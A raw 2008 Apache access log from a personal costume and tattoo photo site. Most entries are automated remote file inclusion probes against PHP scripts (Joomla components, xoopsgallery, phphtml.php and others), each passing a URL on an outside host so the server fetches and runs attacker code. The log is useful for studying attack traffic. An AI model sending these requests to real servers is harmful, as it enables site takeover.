12.196.98.16 - - [30/Jul/2008:22:00:43 -0500] "GET //forums/photoplog/images/5/small/include/admin.lib.inc.php?site_path=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 330 "-""libwww-perl/5.53"
64.246.52.46 - - [30/Jul/2008:22:00:52 -0500] "GET /logs/access_log.1213315200//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://dieguin.t35.com/id.txt?? HTTP/1.1" 404 370 "-""libwww-perl/5.808"
85.239.113.1 - - [30/Jul/2008:22:02:18 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:22:02:18 -0500] "GET /phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:22:02:18 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
85.214.28.190 - - [30/Jul/2008:22:02:32 -0500] "GET /logs/access_log.1207785600//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
85.214.28.190 - - [30/Jul/2008:22:02:33 -0500] "GET //?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
85.214.28.190 - - [30/Jul/2008:22:02:34 -0500] "GET /logs//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 93420 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
87.244.11.20 - - [30/Jul/2008:22:03:18 -0500] "GET /logs/access_log.1207785600//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.244.11.20 - - [30/Jul/2008:22:03:19 -0500] "GET //?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 1243 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.244.11.20 - - [30/Jul/2008:22:03:20 -0500] "GET /logs//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 93420 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
81.169.186.162 - - [30/Jul/2008:22:04:30 -0500] "GET /logs/access_log.1214438400/phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 322 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:22:04:30 -0500] "GET /phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:22:04:30 -0500] "GET /logs/phphtml.php?htmlclass_path=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 300 "-""libwww-perl/5.803"
87.244.11.20 - - [30/Jul/2008:22:04:44 -0500] "GET //?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 1243 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
87.244.11.20 - - [30/Jul/2008:22:04:44 -0500] "GET /logs/access_log.1207785600//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
64.26.63.17 - - [30/Jul/2008:22:04:45 -0500] "GET /logs/administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://paijoe.007gb.com/id.txt??? HTTP/1.1" 404 355 "-""libwww-perl/5.803"
64.26.63.17 - - [30/Jul/2008:22:04:45 -0500] "GET /administrator/components/com_joomlaradiov5/admin.joomlaradiov5.php?mosConfig_live_site=http://paijoe.007gb.com/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.803"
87.244.11.20 - - [30/Jul/2008:22:04:47 -0500] "GET /logs//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 200 93420 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
210.245.166.92 - - [30/Jul/2008:22:06:23 -0500] "GET /logs/access_log.1213142400//faqsupport/samplefaqsupport.php?path[docroot]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:22:06:32 -0500] "GET /logs/access_log.1213315200//faqsupport/samplefaqsupport.php?path[docroot]=http://www.adoradores.kit.net/general? HTTP/1.1" 404 343 "-""libwww-perl/5.79"
87.244.11.20 - - [30/Jul/2008:22:07:44 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.244.11.20 - - [30/Jul/2008:22:08:36 -0500] "GET /logs/access_log.1210896000//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8b4) Gecko/20050908 Firefox/1.4"
87.244.11.20 - - [30/Jul/2008:22:09:29 -0500] "GET /logs/access_log.1210896000//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 312 "-""Mozilla/4.0 (compatible; MSIE 6.0; America Online Browser 1.1; rev1.5; Windows NT 5.1;)"
85.214.28.190 - - [30/Jul/2008:22:09:53 -0500] "GET /logs/access_log.1206230400//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
213.33.84.163 - - [30/Jul/2008:22:09:59 -0500] "GET //?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
213.33.84.163 - - [30/Jul/2008:22:10:00 -0500] "GET /logs//?path%5Bdocroot%5D=http://www.theimageguide.com/uploads/readme.txt???? HTTP/1.1" 200 93420 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:22:10:15 -0500] "GET /logs/db.php?path_local=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:22:10:15 -0500] "GET /db.php?path_local=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:22:10:16 -0500] "GET /logs/db.php?path_local=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 295 "-""libwww-perl/5.805"
141.85.101.1 - - [30/Jul/2008:22:10:16 -0500] "GET /db.php?path_local=http://www.abunaissa.de/ooid.txt?? HTTP/1.1" 404 290 "-""libwww-perl/5.805"
85.214.28.190 - - [30/Jul/2008:22:10:28 -0500] "GET /logs/access_log.1210896000//?path%5Bdocroot%5D=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
58.69.172.67 - - [30/Jul/2008:22:12:10 -0500] "GET /logs/access_log.1212883200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
58.69.172.67 - - [30/Jul/2008:22:12:11 -0500] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 320 "-""libwww-perl/5.803"
58.69.172.67 - - [30/Jul/2008:22:12:12 -0500] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 325 "-""libwww-perl/5.803"
75.107.197.121 - - [30/Jul/2008:22:13:22 -0500] "GET /costume/costume2.htm HTTP/1.1" 200 1810 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:13:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:13:25 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:55 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/thmb3.htm HTTP/1.1" 200 2922 "http://tomdolan.pconline.com/costume/costume2.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm25.jpg HTTP/1.1" 200 9810 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm35.jpg HTTP/1.1" 200 10912 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm26.jpg HTTP/1.1" 200 9402 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm27.jpg HTTP/1.1" 200 9516 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm29.jpg HTTP/1.1" 200 9835 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm28.jpg HTTP/1.1" 200 10658 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm31.jpg HTTP/1.1" 200 9395 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm32.jpg HTTP/1.1" 200 9839 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm33.jpg HTTP/1.1" 200 9703 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm34.jpg HTTP/1.1" 200 9637 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:14:58 -0500] "GET /costume/costm36.jpg HTTP/1.1" 200 9631 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
75.107.197.121 - - [30/Jul/2008:22:15:00 -0500] "GET /costume/costm30.jpg HTTP/1.1" 200 59433 "http://tomdolan.pconline.com/costume/thmb3.htm""Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
70.84.182.98 - - [30/Jul/2008:22:17:16 -0500] "GET /logs/ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://saltgum.com/test.txt? HTTP/1.1" 404 324 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
70.84.182.98 - - [30/Jul/2008:22:17:24 -0500] "GET /ktmlpro/includes/ktedit/toolbar.php?dirDepth=http://saltgum.com/test.txt? HTTP/1.1" 404 319 "-""Mozilla/4.0 (compatible; MSIE 6.0; MSN 2.5; Windows 98)"
210.245.166.92 - - [30/Jul/2008:22:20:35 -0500] "GET /logs/access_log.1214438400//agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:22:20:35 -0500] "GET //agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 309 "-""libwww-perl/5.79"
210.245.166.92 - - [30/Jul/2008:22:20:36 -0500] "GET /logs//agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 314 "-""libwww-perl/5.79"
58.65.228.5 - - [30/Jul/2008:22:22:23 -0500] "GET /logs/index.php?redir=http://www.apnic.net/index.html? HTTP/1.0" 404 286 "-""Mozilla/5.0"
58.65.228.5 - - [30/Jul/2008:22:23:59 -0500] "GET /logs/index.php?redir=http://www.apnic.net/index.html? HTTP/1.0" 404 286 "-""Mozilla/5.0"
58.65.228.5 - - [30/Jul/2008:22:27:59 -0500] "GET /logs/index.php?redir=http://www.apnic.net/index.html? HTTP/1.0" 404 286 "-""Mozilla/5.0"
12.196.98.16 - - [30/Jul/2008:22:33:28 -0500] "GET /logs/db.php?path_local=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 283 "-""libwww-perl/5.53"
12.196.98.16 - - [30/Jul/2008:22:33:36 -0500] "GET /db.php?path_local=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 278 "-""libwww-perl/5.53"
12.196.98.16 - - [30/Jul/2008:22:37:32 -0500] "GET /logs/db.php?path_local=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 283 "-""libwww-perl/5.53"
12.196.98.16 - - [30/Jul/2008:22:37:47 -0500] "GET /db.php?path_local=http://www.abunaissa.de/ooid.txt?? HTTP/1.0" 404 278 "-""libwww-perl/5.53"
210.245.166.92 - - [30/Jul/2008:22:40:04 -0500] "GET /logs/access_log.1212883200//agendax/addevent.inc.php?agendax_path=http://www.adoradores.kit.net/general? HTTP/1.1" 404 336 "-""libwww-perl/5.79"
58.69.172.67 - - [30/Jul/2008:22:44:08 -0500] "GET /logs/access_log.1213142400//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
58.69.172.67 - - [30/Jul/2008:22:44:09 -0500] "GET /logs/access_log.1213315200//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.onconova.com/.../yyy??? HTTP/1.1" 404 347 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:22:47:46 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:22:47:47 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:22:47:47 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
81.169.186.162 - - [30/Jul/2008:22:47:47 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
212.227.48.112 - - [30/Jul/2008:22:48:18 -0500] "GET /logs/?INCLUDE_FOLDER=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.805"
212.227.48.112 - - [30/Jul/2008:22:48:18 -0500] "GET /?INCLUDE_FOLDER=http://www.groovechannel.com.br/v2/r.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.805"
85.239.113.1 - - [30/Jul/2008:22:48:20 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:22:48:21 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:22:48:22 -0500] "GET /logs//program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 348 "-""libwww-perl/5.803"
85.239.113.1 - - [30/Jul/2008:22:48:23 -0500] "GET //program/modules/mods_full/shopping_cart/includes/login.php?_SESSION%5Bdocroot_path%5D=http://www.larisco.com/ha.txt?? HTTP/1.1" 404 343 "-""libwww-perl/5.803"
58.65.228.5 - - [30/Jul/2008:22:50:46 -0500] "GET /logs//ashnews.php?pathtoashnews=http://www.apnic.net/index.html? HTTP/1.0" 404 289 "-""Mozilla/5.0"
64.150.164.61 - - [30/Jul/2008:22:50:51 -0500] "GET /logs/access_log.1212278400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.150.164.61 - - [30/Jul/2008:22:50:51 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.150.164.61 - - [30/Jul/2008:22:50:51 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.150.164.61 - - [30/Jul/2008:22:51:13 -0500] "GET /logs/access_log.1212278400//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.150.164.61 - - [30/Jul/2008:22:51:13 -0500] "GET //administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 356 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.150.164.61 - - [30/Jul/2008:22:51:14 -0500] "GET /logs//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 361 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
64.150.164.61 - - [30/Jul/2008:22:52:14 -0500] "GET /logs/access_log.1215216000//administrator/components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://legalref.ru/config/idfx.txt?? HTTP/1.1" 404 383 "-""Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)"
207.210.115.114 - - [30/Jul/2008:22:55:23 -0500] "GET /logs/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
207.210.115.114 - - [30/Jul/2008:22:55:23 -0500] "GET /send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
81.177.3.99 - - [30/Jul/2008:22:55:42 -0500] "GET //modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 323 "-""libwww-perl/5.813"
81.177.3.99 - - [30/Jul/2008:22:55:42 -0500] "GET /logs//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 328 "-""libwww-perl/5.813"
81.177.3.99 - - [30/Jul/2008:22:55:42 -0500] "GET /logs/access_log.1199750400//modules/xoopsgallery/upgrade_album.php?GALLERY_BASEDIR=http://myminidump.t35.com/v6/id.txt??? HTTP/1.1" 404 350 "-""libwww-perl/5.813"
72.248.189.82 - - [30/Jul/2008:22:55:53 -0500] "GET /logs/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 313 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:22:55:53 -0500] "GET /logs/access_log.1211673600/admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 335 "-""libwww-perl/5.805"
72.248.189.82 - - [30/Jul/2008:22:55:53 -0500] "GET /admin/editor2/errors.php?error=http://paginas.terra.com.br/lazer/xfatalityx/id3.txt??? HTTP/1.1" 404 308 "-""libwww-perl/5.805"
87.244.11.20 - - [30/Jul/2008:22:56:02 -0500] "GET /logs/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
87.244.11.20 - - [30/Jul/2008:22:56:03 -0500] "GET /send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
89.111.179.12 - - [30/Jul/2008:22:56:16 -0500] "GET /logs/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.805"
89.111.179.12 - - [30/Jul/2008:22:56:16 -0500] "GET /send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.805"
65.55.208.138 - - [30/Jul/2008:22:57:00 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.138 - - [30/Jul/2008:22:57:01 -0500] "GET /logs/access_log.1168041600 HTTP/1.1" 200 153582 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
69.93.189.130 - - [30/Jul/2008:22:57:58 -0500] "GET /?INCLUDE_FOLDER=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 1243 "-""libwww-perl/5.810"
69.93.189.130 - - [30/Jul/2008:22:57:58 -0500] "GET /logs/?INCLUDE_FOLDER=http://mabat.edumining.info/oye.txt?? HTTP/1.1" 200 93415 "-""libwww-perl/5.810"
89.108.67.220 - - [30/Jul/2008:22:58:23 -0500] "GET /logs/send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 307 "-""libwww-perl/5.812"
89.108.67.220 - - [30/Jul/2008:22:58:24 -0500] "GET /send_reminders.php?includedir=http://www.mmorpgpad.com/themes/1206334778social_yellow.txt?? HTTP/1.1" 404 302 "-""libwww-perl/5.812"
68.104.91.231 - - [30/Jul/2008:22:59:19 -0500] "GET /tattoo/tattoo1.htm HTTP/1.1" 200 3776 "http://www.google.com/search?hl=en&q=bert+grimm+flash&btnG=Google+Search""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:19 -0500] "GET /tattoo/tat_1st.JPG HTTP/1.1" 200 16480 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:19 -0500] "GET /tattoo/webring.jpg HTTP/1.1" 200 13114 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:19 -0500] "GET /favicon.ico HTTP/1.1" 404 295 "-""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:22 -0500] "GET /tattoo/set1.htm HTTP/1.1" 200 2676 "http://tomdolan.pconline.com/tattoo/tattoo1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:22 -0500] "GET /tattoo/tat1.JPG HTTP/1.1" 200 16158 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:22 -0500] "GET /tattoo/tat10.JPG HTTP/1.1" 200 22746 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:22 -0500] "GET /tattoo/tat2.JPG HTTP/1.1" 200 18943 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:22 -0500] "GET /tattoo/tat3.jpg HTTP/1.1" 200 11901 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:22 -0500] "GET /tattoo/tat4.JPG HTTP/1.1" 200 18080 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:23 -0500] "GET /tattoo/tat5.JPG HTTP/1.1" 200 13769 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:23 -0500] "GET /tattoo/tat6.JPG HTTP/1.1" 200 18543 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:23 -0500] "GET /tattoo/tat7.JPG HTTP/1.1" 200 17358 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
68.104.91.231 - - [30/Jul/2008:22:59:23 -0500] "GET /tattoo/tat8.jpg HTTP/1.1" 200 13191 "http://tomdolan.pconline.com/tattoo/set1.htm""Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.16) Gecko/20080702 Firefox/2.0.0.16"
